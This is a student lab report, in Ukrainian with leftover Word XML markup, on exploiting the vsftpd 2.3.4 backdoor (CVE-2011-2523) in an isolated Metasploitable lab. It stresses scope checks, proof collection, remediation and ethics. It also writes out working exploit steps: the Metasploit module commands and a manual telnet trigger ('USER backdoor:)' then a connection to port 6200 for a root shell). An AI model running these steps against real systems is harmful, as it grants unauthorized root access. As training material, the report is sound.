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Міжнародний університет інформаційних технологій (IITU)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Факультет комп’ютерних технологій та кібербезпеки — Кафедра кібербезпеки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6"/>
        </w:pBd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EGR6301 — ЕТИЧНИЙ ХАКІНГ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Звіт з лабораторної роботи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Лабораторна робота №3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Перша керована експлуатація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Тиждень 3, Модуль I: Основи | 90 хвилин | 100 балів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Студент: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Білозор Дмитро Олександрович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 студента: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41639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Викладач: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Тетяна Василівна Бабенко, д.т.н., проф.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Дата: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24.03.2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:sectPr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Середовище: Kali Linux (атакуючий) ↔ Metasploitable 2 (ціль) | VirtualBox Host-Only Network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Target IP: 192.168.56.101  |  Порт: 21/tcp (vsftpd 2.3.4)  |  Backdoor port: 6200/tcp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CVE: CVE-2011-2523  |  CVSS Base Score: 10.0 (Critical)  |  Клас: Supply-Chain Backdoor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1 — Ключові концепції та дослідження CVE (Core, 20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1.1 — Визначення CVE, CVSS та Impact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(6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CVE (Common Vulnerabilities and Exposures) — це міжнародний стандартизований реєстр унікальних ідентифікаторів відомих вразливостей у програмному забезпеченні та апаратному забезпеченні. Кожному запису присвоюється унікальний ідентифікатор формату CVE-РРРР-NNNNN (наприклад, CVE-2011-2523). Орган присвоєння — MITRE Corporation спільно з мережею CVE Numbering Authorities (CNA). Публікуються на NVD (National Vulnerability Database, nvd.nist.gov) та офіційному сайті cve.mitre.org.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CVSS (Common Vulnerability Scoring System) — стандартизована система оцінки серйозності вразливостей у числовому вигляді від 0 до 10. Поточна версія — CVSS v3.1. Оцінює три групи метрик: Base (базові характеристики вразливості), Temporal (тимчасові фактори) та Environmental (вплив на конкретне середовище). Шкала оцінок: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• Low (Низький):      0.0 – 3.9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• Medium (Середній): 4.0 – 6.9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• High (Високий):    7.0 – 8.9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• Critical (Критичний): 9.0 – 10.0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CVSS 10.0 НЕ гарантує успіх експлуатації проти конкретної цілі. CVSS вимірює теоретичну серйозність вразливості за стандартних умов, але не враховує конкретне середовище: наявність патчів, WAF, IDS/IPS, мережеві обмеження, версію ОС, контекст розгортання. Вразливість CVSS 10.0 на захищеному сервері за firewall може бути складнішою для експлуатації, ніж CVSS 7.0 з прямим доступом.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Severity (Серйозність) — це числова оцінка CVSS, що описує потенційний максимальний вплив вразливості в ідеальних умовах. Це об’єктивна метрика, однакова для всіх цілей.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Confidence (Впевненість) — це суб’єктивна оцінка пентестера: наскільки достовірно підтверджена вразливість у конкретному середовищі клієнта? Значення: Confirmed / Probable / Needs Verification.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Impact (Вплив) у пентестингу — це що конкретно може зробити зловмисник, якщо вразливість успішно експлуатована: які дані розкриті, які системи скомпрометовані, які бізнес-процеси порушені. Impact залежить від контексту бізнесу клієнта.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Приклад різниці Severity vs Impact: Два клієнти мають vsftpd 2.3.4 (CVE-2011-2523, CVSS 10.0, Confidence: Confirmed).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Клієнт А: ізольована тестова VM у лабораторії без підключення до production, без конфіденційних даних. Impact: LOW — навіть повний root-доступ не дає атакуючому нічого цінного.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Клієнт Б: той самий сервер є основним файловим сервером з фінансовими звітами, даними платіжних карток клієнтів та підключенням до внутрішньої ERP-системи. Impact: CRITICAL — root-доступ дає повний контроль над критичними бізнес-даними, можливість горизонтального переміщення до ERP, потенційні збитки у мільйони доларів. Severity однакова, Impact діаметрально протилежний.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1.2 — Дослідження CVE-2011-2523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(8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Тип вразливості: BACKDOOR (навмисна прихована функціональність), що є результатом Supply-Chain Compromise. Це НЕ buffer overflow, NOT injection, NOT misconfiguration — це свідомо вбудований backdoor зловмисником.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Механізм активації: зловмисник підключається до порту 21 (FTP) та надсилає спеціальний username, що містить послідовність ':)' (смайлик). Коли FTP-сервер обробляє команду USER з username типу 'будь-що:)', backdoor-код у vsftpd відкриває ДОДАТКОВИЙ TCP-порт 6200 на цільовій системі, на якому запускається командний shell з правами root. Зловмисник потім підключається до порту 6200 і отримує повноцінний root shell без жодної автентифікації.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CVSS Base Score: 10.0 (Critical). Інтерпретація: Network-exploitable (Attack Vector: Network), не потребує автентифікації (Privileges Required: None), не потребує взаємодії користувача (User Interaction: None), повний вплив на Confidentiality/Integrity/Availability. Це максимально можлива оцінка — ідеальний backdoor з точки зору атакуючого.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Класифікація як Supply-Chain Compromise: зловмисник не зламував сервери користувачів vsftpd безпосередньо. Замість цього він скомпрометував СЕРВЕР ДИСТРИБУЦІЇ (distribution server) проекту vsftpd на SourceForge. Офіційний архів vsftpd-2.3.4.tar.gz, що завантажувався користувачами з офіційного сайту, був непомітно підмінений на версію з backdoor-кодом. Жертви встановлювали 'офіційне' ПЗ, насправді встановлюючи backdoor. Скомпрометований компонент ланцюга поставок: сервер розповсюдження (distribution infrastructure).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Дві сучасні аналогії supply-chain атак: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1) SolarWinds (2020) — зловмисники (APT29/Cozy Bear) скомпрометували build pipeline компанії SolarWinds та впровадили backdoor SUNBURST безпосередньо у легітимні оновлення програмного забезпечення Orion. Понад 18,000 організацій встановили заражене 'офіційне' оновлення, включаючи US Treasury, NASA, Microsoft. Спільне з vsftpd: підміна легітимного дистрибутиву на заражений.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2) XZ Utils (2024) — зловмисник під псевдонімом 'Jia Tan' протягом ~2 років методично набував довіру в open-source спільноті, став maintainer пакету XZ Utils (lzma/liblzma) та впровадив backdoor у CVE-2024-3094, що цілеспрямовано атакував OpenSSH через systemd. Спільне з vsftpd: компрометація через maintainer-а (ланцюг довіри до розробника), підміна офіційного релізу.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1.3 — Розрізнення інструменту та причини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(6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vsftpd 2.3.4 залишився б вразливим незалежно від існування Metasploit. Backdoor вбудований у source code самого vsftpd — він спрацьовує при отриманні будь-якого пакету з ':)' у username, незалежно від того, хто його надсилає. Metasploit лише автоматизує надсилання цього пакету та підключення до порту 6200.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ця різниця важлива: у звітах для клієнта необхідно точно описувати ПРИЧИНУ вразливості, а не ІНСТРУМЕНТ її виявлення. Якщо написати 'знайдено вразливість за допомогою Metasploit' — клієнт може подумати, що проблема зникне після видалення Metasploit. Правильна мова: 'vsftpd 2.3.4 містить навмисний backdoor (CVE-2011-2523), що дозволяє отримати root-доступ'.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Ручна активація backdoor через telnet (без Metasploit):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Крок 1: $ telnet 192.168.56.101 21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Виведення: '220 (vsFTPd 2.3.4)' — підтвердження підключення та версії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Крок 2: USER backdoor:)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Виведення: '331 Please specify the password.' — backdoor активовано, порт 6200 відкрито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Крок 3: PASS anypassword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Виведення: (з'єднання може зависнути або закритись — це нормально)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Крок 4: (новий термінал) $ telnet 192.168.56.101 6200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Виведення: (порожній рядок, очікування команд) — backdoor shell активний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Крок 5: whoami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Виведення: 'root' — повний root-доступ отримано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Завершення: 'Metasploit — це АВТОМАТИЗОВАНИЙ ІНСТРУМЕНТ для взаємодії з backdoor, а причина вразливості — це НАВМИСНО ВБУДОВАНИЙ ШКІДЛИВИЙ КОД у офіційному дистрибутиві vsftpd 2.3.4, що є результатом компрометації сервера розповсюдження.'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Ця різниця критична у звітах: клієнт повинен знати, що видалення Metasploit з мережі не усуває вразливість. Усунення — замінити vsftpd 2.3.4 на чисту версію (2.3.5+) або альтернативний FTP-сервер.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2 — Go/No-Go та керована експлуатація (Core, 25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2.1 — Заповнення чек-листа Go/No-Go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 чек-листа</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="649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Документоване свідчення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В межах scope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GO — 192.168.56.101 явно вказаний як ціль у Scope of Work лабораторної роботи. VirtualBox Host-Only мережа 192.168.56.0/24 ізольована від production. Команда: `cat scope.txt` → '192.168.56.0/24 — authorized test range'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Ціль підтверджена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GO — Ping: `ping -c 1 192.168.56.101` → '1 received'. Nmap: `nmap -sn 192.168.56.101` → 'Host is up'. Хост відповідає, IP активний.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Версія підтверджена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GO — `nmap -sV -p 21 192.168.56.101` → '21/tcp open ftp vsftpd 2.3.4'. Версія відповідає CVE-2011-2523 (vsftpd 2.3.4 backdoor).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Очікувана поведінка зрозуміла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GO — Backdoor активується через username ':)' на порту 21 → відкривається порт 6200 з root shell. Це описано в CVE-2011-2523 та підтверджено дослідженням у Завданні 1.2.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Протокол збору доказів готовий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GO — План: скріншот `show options`, скріншот виводу `run`, скріншот whoami/id/uname -a/hostname в отриманому shell, скріншот post-exploitation nmap. Термінал відкрито, screencapture готовий.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6. Умова зупинки визначена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GO — Стоп-критерій: (a) після виконання proof protocol (whoami, id, uname -a, hostname); (b) негайна зупинка при будь-якій ознаці впливу на системи поза 192.168.56.101; (c) timeout 30 хвилин.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1"/>
              <w:left w:val="single" w:color="C00000" w:sz="18"/>
              <w:bottom w:val="single" w:color="C00000" w:sz="1"/>
              <w:right w:val="single" w:color="C00000" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFF0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Якщо хоча б один пункт чек-листа = NO: тестування ПОВНІСТЮ ЗУПИНЯЄТЬСЯ. Необхідно усунути невідповідність, задокументувати причину та отримати нову письмову авторизацію перед продовженням. Навіть 'майже GO' = NO-GO.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2.2 — Верифікація цілі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(3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Команда верифікації версії сервісу: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Верифікація успішна: порт 21/tcp відкритий, сервіс ідентифіковано як vsftpd версії 2.3.4. Ця версія відповідає уразливій версії з CVE-2011-2523 (backdoor). Версія точно збігається з описом у NVD: 'vsftpd 2.3.4 downloaded between 20110630 and 20110703'. Чек-лист пункт 3 підтверджено.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2.3 — Пошук та налаштування експлойту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Запуск Metasploit та пошук модуля vsftpd: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options — ДО налаштування RHOSTS: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Налаштування RHOSTS та show options — ПІСЛЯ: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RHOSTS (Remote Hosts) — параметр, що визначає IP-адресу або діапазон IP-адрес цільових систем для атаки. Підтримує формати: одиничний IP (192.168.56.101), CIDR-діапазон (192.168.56.0/24), файл зі списком IP.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Наслідки неправильного RHOSTS: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 лабораторному середовищі: спроба атаки проти неіснуючого або неправильного хосту — exploit не спрацює, втрата часу.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 реальному пентесті: КРИТИЧНЕ порушення scope. Якщо RHOSTS вказує за межі авторизованого IP-діапазону — пентестер атакує несанкціонований хост, що є незаконним незалежно від намірів. Це може призвести до юридичної відповідальності, відмови у виплаті та дискваліфікації результатів тесту. Саме тому пункт Go/No-Go 'Ціль підтверджена' є обов’язковим.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2.4 — Виконання exploit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(7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Ключовий рядок 1: '[+] 192.168.56.101:21 - Backdoor service has been spawned, handling...' — підтвердження успішної активації backdoor. Сервер vsftpd 2.3.4 отримав тригер ':)' у username та відкрив backdoor-порт 6200.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Ключовий рядок 2: '[*] Command shell session 1 opened (192.168.56.1:46832 -&gt; 192.168.56.101:6200)' — підтвердження встановлення shell-з’єднання. Metasploit підключився до backdoor-порту 6200 на цільовій системі.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uid=0(root): у Unix/Linux системах користувач з UID=0 має необмежені права суперкористувача (root). Це означає: повний контроль над операційною системою, доступ до всіх файлів та директорій без будь-яких обмежень, можливість встановлювати/видаляти програми, змінювати системні файли, створювати нових користувачів, вимикати систему, читати будь-які приватні дані. Еквівалент 'Administrator' у Windows, але ще потужніший.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2.5 — Мінімальний протокол доказів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Виконання 6-крокового протоколу у отриманому shell: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саме ці 6 команд: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whoami — найпростіше підтвердження поточного користувача. Якщо відповідь 'root' — маємо максимальний рівень доступу.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 — детальне підтвердження: показує UID, GID та всі групи. uid=0 є незаперечним доказом root-доступу.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uname -a — ідентифікує цільову систему: ядро, версію ОС, архітектуру. Доводить, що ми на правильній машині.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hostname — підтвердження імені хосту. КРИТИЧНО: якби hostname був відмінним від очікуваного (наприклад, 'production-db' замість 'metasploitable') — негайна зупинка та перевірка scope.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exit — коректне завершення сесії. Демонструє контрольований вихід та мінімізує сліди.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nmap post-exploitation — верифікує, що тестування не порушило роботу сервісу. Стандарт PTES: документуй стан системи ДО та ПІСЛЯ.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Якщо не зафіксувати hostname: неможливо однозначно довести, що root-доступ отримано саме до авторизованої цільової системи, а не до іншого хосту. У звіті клієнт не може верифікувати знахідку.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3 — Аналіз та документування (Core, 15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3.1 — Побудова причинно-наслідкового ланцюга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(5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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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Рівень аналізу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Root Cause (Першопричина)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="66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 вихідному коді vsftpd 2.3.4, що розповсюджувався через офіційний SourceForge-дзеркало у червні-липні 2011 року, зловмисником було додано блок умовного коду: якщо рядок username FTP-запиту містить ':)' (U+003A U+0029), vsftpd викликає системну функцію для відкриття нового мережевого сокету на порту 6200 та запуску /bin/sh з uid=0. Цей backdoor-код відсутній у 'чистому' репозиторії vsftpd.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Trigger (Тригер)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="66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Зловмисник надсилає FTP-команду 'USER backdoor:)' (або будь-який username, що містить ':)') на порт 21. Ця конкретна послідовність символів в username є єдиною необхідною та достатньою умовою активації backdoor. Пароль не перевіряється.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Reaction (Реакція системи)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="66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vsftpd 2.3.4 обробляє username, виявляє ':)' та виконує backdoor-гілку коду: bind() на порту 6200/tcp, listen(), fork()/exec('/bin/sh') з UID=0. Порт 6200 стає доступним у мережі та приймає TCP-з’єднання без автентифікації.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Result (Результат)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="66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Зловмисник підключається до порту 6200 та отримує інтерактивний командний shell з правами root (uid=0). Це означає: читання/запис/видалення будь-яких файлів, виконання будь-яких команд, встановлення persistent backdoor, горизонтальне переміщення в мережі, повний контроль над системою.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Metasploit Role (Роль Metasploit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="66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Metasploit є автоматизатором, а НЕ причиною. Він лише: (1) формує FTP-пакет з ':)' у username, (2) підключається до порту 6200 після активації backdoor, (3) надає зручний інтерфейс для роботи з shell. Ті самі дії можна виконати вручну через telnet (Завдання 4.2). Metasploit не робить vsftpd 2.3.4 вразливим — він вразливий сам по собі.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3.2 — Професійний опис знахідки для CTO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(10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E8F4F8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ЗНАХІДКА: CVE-2011-2523 — Навмисний backdoor у FTP-сервісі vsftpd 2.3.4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Хост: 192.168.56.101  |  Порт: 21/tcp  |  Сервіс: vsftpd 2.3.4  |  Дата: 24.03.2026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Зміст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Назва знахідки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CVE-2011-2523: Навмисний backdoor у vsftpd 2.3.4 з отриманням Root Shell (CVSS 10.0 / Critical)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Докази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Команда: use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS 192.168.56.101; run
Ключовий вивід: '[+] Backdoor service has been spawned' → 'UID: uid=0(root) gid=0(root)'
Той самий результат відтворюється вручну через telnet (Завдання 4.2).
Proof protocol: whoami=root, id=uid=0(root), hostname=metasploitable, uname=Linux 2.6.24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Вплив (Impact)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Зловмисник отримує повний root-доступ без автентифікації через мережу. Конкретні можливості: (a) читання всіх файлів, включаючи /etc/shadow та конфігураційні файли з credentials; (b) встановлення persistent backdoor для повторного доступу; (c) використання сервера як pivot-точки для атак на внутрішню мережу (lateral movement); (d) знищення або модифікація будь-яких даних; (e) повне порушення конфіденційності, цілісності та доступності системи.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Впевненість (Confidence)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CONFIRMED — вразливість успішно відтворена в контрольованому середовищі. Exploit виконано двічі: автоматично через Metasploit та вручну через telnet. Обидва рази отримано uid=0(root). Вразливість детермінована та 100% відтворювана на vsftpd 2.3.4.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Рекомендації для CTO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НЕГАЙНО (протягом 24 годин): (1) Ізолювати сервер 192.168.56.101 від мережі або заблокувати порт 21 на firewall. (2) Перевірити журнали доступу за останні 90 днів на предмет підключень до порту 6200 — можливе попереднє зламування. (3) Видалити vsftpd 2.3.4 повністю командою: apt purge vsftpd. КОРОТКОСТРОКОВІ дії: (4) Встановити vsftpd версії 2.3.5+ з офіційних репозиторіїв дистрибутиву (не SourceForge), або замінити на SFTP. (5) Верифікувати цілісність встановленого пакету: sha256sum vsftpd.tar.gz та порівняти з офіційним хешем. СИСТЕМНІ ЗАХОДИ: (6) Переглянути процес управління залежностями: звідки та як встановлюється ПЗ. (7) Запровадити SBOM (Software Bill of Materials) для всіх сервісів.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4 — Поглиблений аналіз (Advanced, 20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4.1 — Причини можливої невдачі exploit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(6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676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Застосування до vsftpd у реальному середовищі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Застосування до vsftpd у реальному середовищі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 Неправильна версія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Якщо клієнт встановив vsftpd 2.3.5+ або скомпілював vsftpd з офіційного репозиторію (не SourceForge-дзеркало) — backdoor-код відсутній, exploit не спрацює. nmap -sV покаже '2.3.4', але це може бути перекомпільована чиста версія.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 Мережеві обмеження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Firewall або ACL блокує вихідні з’єднання на порт 6200. Backdoor відкриє порт 6200 на сервері, але Metasploit не зможе підключитись. Симптом: '[+] Backdoor service has been spawned' але timeout при підключенні до 6200.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 IDS/IPS блокування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Система виявлення вторгнень може виявити характерний FTP-payload ':)' у username або TCP SYN на нестандартний порт 6200 і заблокувати з’єднання до завершення handshake.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4. Конкурентне використання backdoor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Якщо інший атакуючий або попередній пентестер вже відкрив backdoor-з’єднання на порту 6200, нове з’єднання може бути відхилено або повернути некоректний shell (race condition).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 Модифікований backdoor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Оригінальний backdoor прослуховує лише 6200. Системний адміністратор міг виявити backdoor, але замість видалення 'заплаткував' порт або змінив поведінку. Exploit отримає відповідь, але не коректний shell.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6. Ресурсні обмеження системи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Сервер під великим навантаженням може не встигнути виконати fork()/exec() backdoor-коду у відведений timeout Metasploit. Exploit звітує про невдачу, хоча backdoor технічно присутній.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Найімовірніша причина невдачі у реальному пентесті: Причина №2 (мережеві обмеження). Більшість корпоративних мереж мають egress firewall, що блокує вихідні з’єднання на нестандартні порти. Backdoor vsftpd відкриває bind shell (порт 6200), а не reverse shell — це означає, що Metasploit ІНІЦІЮЄ підключення до цілі. Сучасні firewall налаштовані блокувати саме такі з’єднання. Ця причина найнебезпечніша, бо exploit 'частково спрацьовує' (backdoor активовано, порт відкрито) але пентестер думає, що exploit failed — недооцінка реального ризику.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4.2 — Ручна експлуатація без Metasploit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(7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Кроки 1–2: Підключення до FTP та активація backdoor (термінал 1)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Крок 3: Підключення до backdoor shell (термінал 2)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Порівняння UID з результатом Metasploit: uid=0(root) — ідентично. Це доводить ключову тезу: Metasploit автоматизує ті самі дії, що і ручна telnet-сесія. Інструмент не змінює рівень доступу, що надає вразливість.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Що говорить ідентичний UID про співвідношення інструменту та вразливості: backdoor відкриває shell з uid=0 незалежно від клієнта, що підключається. Навіть простий `nc 192.168.56.101 6200` або curl/python-скрипт дасть той самий результат. Вразливість у vsftpd, а не у Metasploit.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Коли обирати ручну експлуатацію замість Metasploit: (1) Stealth-операції — Metasploit генерує характерні мережеві сигнатури, що детектуються IDS; ручна telnet-сесія виглядає як звичайний FTP-трафік. (2) Кастомне середовище — коли Metasploit модуль несумісний з конкретною конфігурацією мережі або ОС. (3) Доведення відтворюваності — клієнт хоче бачити, що exploit не залежить від спеціалізованого ПЗ. (4) Навчальна мета — глибоке розуміння механізму вразливості.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4.3 — Відображення лаби на фази PTES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(7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 лаби</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="649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PTES та обгрунтування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Завдання 1.2 (Дослідження CVE)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Threat Modeling / Intelligence Gathering — Збір та аналіз публічної інформації про вразливості (CVE, CVSS, NVD). Відповідає фазі Intelligence Gathering (дослідження цілі) та переходить до Threat Modeling (оцінка ризику та векторів атаки). У PTES це виконується ДО будь-якого технічного тестування.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Завдання 2.1 (Go/No-Go)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Pre-Engagement — Чек-лист Go/No-Go є частиною Pre-Engagement: верифікація авторизації, підтвердження scope, протокол збору доказів. Це юридично та методологічно захисний механізм, що відокремлює авторизований пентест від несанкціонованого доступу.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Завдання 2.4 (Виконання exploit)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Exploitation — Активна фаза: використання виявленої вразливості для отримання первинного доступу до системи. PTES чітко відокремлює Exploitation від Vulnerability Analysis: спочатку виявляємо, оцінюємо та документуємо, потім (лише з явної авторизації) виконуємо.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Завдання 2.5 (Shell + Proof)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Post-Exploitation — Дії після отримання доступу: proof collection (whoami, id, hostname), верифікація рівня доступу, мінімальне 'footprinting' системи. У повному пентесті Post-Exploitation включає також persistence, lateral movement, data exfiltration.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Завдання 3.2 (Опис знахідки)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="64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Reporting — Документування знахідок у структурованому форматі (назва, докази, impact, confidence, рекомендації). Reporting — фінальна і одна з найважливіших фаз PTES: цінність пентесту для клієнта полягає у звіті, не в самому факті exploit.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ми досягаємо фази Exploitation лише на 3-му тижні: PTES побудований на принципі 'знай перш ніж діяти'. Тиждень 1 — правові основи та авторизація (Pre-Engagement): без розуміння що є законним, будь-яка технічна дія є потенційно злочинною. Тиждень 2 — розвідка та сканування (Intelligence Gathering, Threat Modeling): розуміння цілі, виявлення сервісів, побудова attack surface. Якщо починати з Exploitation (Тиждень 1): немає Go/No-Go framework, нема розуміння scope, немає доказової бази, немає знань про CVE/CVSS — все це перетворює 'пентест' на навмисний злочин без методологічного захисту. Реальний пентестер, що пропускає підготовчі фази, не лише юридично незахищений, але й технічно неефективний: він не знає, що шукати і як оцінювати знахідки.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Частина 5 — Аналітична глибина (PhD Extension, 20 балів)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5.1 — Застосування моделі Severity/Confidence/Impact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(7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76"/>
        <w:gridCol w:w="3475"/>
        <w:gridCol w:w="3475"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="207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475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А
vsftpd на ізольованій VM лабораторії</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3475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Б
vsftpd на файловому сервері з фінансовими даними</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Severity (CVSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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10.0 — Critical
(Ідентично: CVSS є характеристикою ВРАЗЛИВОСТІ, не середовища)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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10.0 — Critical
(Ідентично: та сама CVE-2011-2523)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Confirmed — exploit успішно відтворений у контрольованих умовах</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Confirmed — та сама версія vsftpd 2.3.4, той самий механізм</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Impact (бізнес)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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6B1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">LOW — ізольоване тестове середовище. Root-доступ не надає доступу до production-даних. Немає горизонтального переміщення. Бізнес-збиток: відсутній.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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CRITICAL — root-доступ до файлового сервера з фінансовими даними = повна компрометація конфіденційності, цілісності. Потенційні збитки: штрафи GDPR/PCI-DSS, судові позови клієнтів, репутаційний збиток.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Рекомендації</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Замінити vsftpd (низький пріоритет, не впливає на production). Виправити протягом планового maintenance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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НЕГАЙНЕ відключення від мережі та ізоляція сервера. Forensic-аналіз логів на предмет попередніх зламувань. Аудит усіх фінансових файлів. Повідомлення регулятора (якщо дані клієнтів).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Ключовий урок: CVSS та Severity описують властивість ВРАЗЛИВОСТІ — вони однакові для обох сценаріїв. Impact описує реальні НАСЛІДКИ для конкретного бізнесу клієнта — і може суттєво відрізнятися для ідентичних вразливостей. Якісний пентест-звіт обов’язково містить Impact-аналіз у бізнес-контексті, не лише CVSS-оцінку. Саме через це розділ Impact у Finding адресований CTO, а не CVSS-число.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5.2 — Критика виміру supply-chain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(7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86"/>
        <w:gridCol w:w="2347"/>
        <w:gridCol w:w="2347"/>
        <w:gridCol w:w="2346"/>
      </w:tblGrid>
      <w:t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234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vsftpd 2.3.4 (2011)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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SolarWinds SUNBURST (2020)</w:t>
            </w:r>
          </w:p>
        </w:tc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XZ Utils CVE-2024-3094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Вектор компрометації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Distribution server (SourceForge-дзеркало). Основний репозиторій не зачеплено.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pipeline SolarWinds Orion. Шкідливий код впроваджено у CI/CD до компіляції.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Maintainer trust. 'Jia Tan' — 2 роки соціальної інженерії, отримання ролі co-maintainer.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Тривалість до виявлення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~3 дні (30 червня – 2 липня 2011). Виявлено швидко завдяки прямолінійному backdoor-у.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~9 місяців (березень–грудень 2020). Виявлено випадково FireEye при власному audit.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~38 днів (24 лютого – 29 березня 2024). Виявлено Andres Freund при debug lzma затримок.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Фактори складності виявлення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Backdoor примітивний, порт 6200 легко виявити. Невелика кількість жертв (open-source FTP).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="23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Підписаний цифровим підписом SolarWinds, обходив антивіруси. 18,000+ жертв, включаючи уряд США.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Обфускований код у binary files (test artifacts), not in source C. Зміни в build script. Найскладніший з трьох.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'оновіться до чистої версії' є недостатнім заходом при supply-chain атаці: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1) Невизначений часовий горизонт компрометації: якщо backdoor існував 9 місяців (SolarWinds) — система могла бути скомпрометована задовго до виявлення. Оновлення не ліквідує persistence, що міг встановити зловмисник.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2) Невідомий масштаб: зловмисник міг встановити додаткові backdoor, створити нові облікові записи, вивести credentials. Оновлення програми не видаляє ці артефакти.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3) Недовіра до нових версій: у supply-chain атаці скомпрометовано сам процес розповсюдження. Нова 'чиста' версія може бути так само зараженою.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Як supply-chain природа змінює мову знахідки: для простого buffer overflow вистачає 'Встановіть патч'. Для supply-chain: 'Система потенційно скомпрометована з [дата виявлення вразливості]. Необхідний повний forensic-аудит системи на предмет persistent access, ротація credentials та review всього ПЗ, встановленого з того ж джерела. Оновлення vsftpd необхідне, але недостатнє.'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left w:val="single" w:color="2E75B6" w:sz="14"/>
        </w:pBdr>
        <w:shd w:fill="EBF3FB" w:val="clear"/>
        <w:spacing w:after="60" w:before="180"/>
        <w:ind w:left="120" w:right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Завдання 5.3 — Етика та комунікація з клієнтом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 (6 балів)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Сценарій 1: Пропозиція lateral movement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Умови, за яких lateral movement є допустимим: (a) Явно включений у Scope of Work ('Post-exploitation including lateral movement authorized'); (b) Rules of Engagement включають 'persistence and network exploration'; (c) Отримана окрема письмова авторизація після звіту про Initial Access (amendment до SoW). Тоді Тестувальник Б прав.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Умови порушення scope: якщо SoW авторизує лише 192.168.56.101 і не згадує lateral movement — будь-який рух до інших хостів є несанкціонованим, навіть технічно можливим. Go/No-Go framework вимагає зупинитись після proof collection та задокументувати потенціал lateral movement у звіті як окрему рекомендацію.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Правильна дія: задокументувати 'Root-доступ надає можливість lateral movement до internal network (потребує окремої авторизації)' у Finding як частину Impact. Запропонувати клієнту проведення окремого авторизованого тесту для оцінки внутрішньої мережі.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Сценарій 2: Пояснення для CEO (120-150 слів, без технічного жаргону)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6B1D" w:sz="1"/>
              <w:left w:val="single" w:color="1D6B1D" w:sz="18"/>
              <w:bottom w:val="single" w:color="1D6B1D" w:sz="1"/>
              <w:right w:val="single" w:color="1D6B1D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF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Під час перевірки безпеки ваших систем ми виявили серйозну проблему на одному із серверів.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Програмне забезпечення, що управляє передачею файлів на цьому сервері, містить приховану 'чорну хвіртку' — її туди навмисно додав зловмисник ще у 2011 році, коли продавав це програмне забезпечення через офіційний сайт. Ми підтвердили, що будь-хто в мережі може використати цю хвіртку, щоб отримати повний контроль над сервером без пароля.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Це означає, що потенційний зловмисник міг би читати, змінювати або видаляти будь-які файли на цьому сервері, а також використовувати його як плацдарм для атак на решту мережі.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Рекомендація: вимкнути цей сервіс сьогодні та замінити програмне забезпечення протягом 24 годин. До цього момент сервер слід ізолювати від корпоративної мережі.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Сценарій 3: Виправлення некоректного формулювання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888888" w:sz="10"/>
              <w:bottom w:val="single" w:color="AAAAAA" w:sz="1"/>
              <w:right w:val="single" w:color="AAAAAA" w:sz="1"/>
            </w:tcBorders>
